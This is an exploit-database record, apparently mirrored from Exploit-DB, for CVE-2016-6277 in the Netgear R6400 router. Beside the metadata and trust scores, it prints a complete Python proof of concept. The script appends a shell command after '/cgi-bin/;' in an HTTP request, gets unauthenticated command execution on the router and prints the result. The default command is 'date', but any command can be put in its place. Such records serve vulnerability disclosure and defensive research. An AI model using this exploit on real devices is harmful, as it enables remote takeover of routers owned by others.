ID
VAR-E-201912-0115
EDB ID
47782
TITLE
Netgear R6400 - Remote Code Execution - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Netgear R6400 - Remote Code Execution.. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | netgear | model: | r6400 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
# Exploit Title: Netgear R6400 - Remote Code Execution
# Date: 2019-12-14
# Exploit Author: Kevin Randall
# CVE: CVE-2016-6277
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93
# PoC
#!/usr/bin/python
import urllib2
IP_ADDR = "192.168.1.1"
PROTOCOL = "http://"
DIRECTORY = "/cgi-bin/;"
CMD = "date"
FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD
req = urllib2.Request(url = FULL_URL)
response = urllib2.urlopen(req)
commandoutput = response.read()
spl_word = "}"
formattedoutput = commandoutput
result = formattedoutput.rpartition(spl_word)[2]
print result
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Code Execution
Trust: 1.6
CREDITS
Kevin Randall
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 47782 | Trust: 1.6 |
| db: | EDBNET | id: | 102354 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/47782/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 47782 |
| db: | EDBNET | id: | 102354 |
LAST UPDATE DATE
2022-07-27T09:49:09.886000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 47782 | date: | 2019-12-17T00:00:00 |
| db: | EDBNET | id: | 102354 | date: | 2019-12-17T00:00:00 |